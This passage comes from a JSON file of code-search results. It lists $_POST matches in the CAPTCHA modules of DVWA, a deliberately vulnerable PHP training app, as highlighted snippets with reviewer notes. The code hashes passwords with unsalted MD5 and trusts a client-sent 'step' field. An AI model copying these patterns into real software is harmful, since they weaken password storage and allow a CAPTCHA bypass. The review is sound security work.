spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 103,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span 
class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
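  "note": "pass_new goes through mysqli_real_escape_string on line 13 and md5 on line 14: the escaping changes the bytes that get hashed, and unsalted MD5 is not a suitable password hash; a salted, slow password hashing function such as password_hash is the usual replacement."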
 },
 {
  "id": 104,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span 
class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 16,
  "start": 11,
  "end": 22,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 105,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"highlight\"><span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span 
class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party",
  "line": 21,
  "start": 16,
  "end": 27,
  "severity": "unknown",
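  "note": "Lines 16-24: password_conf and password_current are read from $_POST, passed through stripslashes() and mysqli_real_escape_string(), then hashed with plain md5(). MD5 is too fast to be a safe password hash; PHP's password_hash()/password_verify() are the usual replacement. The query that consumes these values is outside the lines shown."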
 },
 {
  "id": 106,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \n<span 
class=\"line-number\">32:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">33:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">34:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
  "line": 29,
  "start": 24,
  "end": 35,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 107,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">27:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">29:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">33:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token 
operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">34:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">35:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />The CAPTCHA was incorrect. Please try again.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 30,
  "start": 25,
  "end": 36,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 115,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 116,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'1'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span 
class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 117,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span 
class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 118,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span 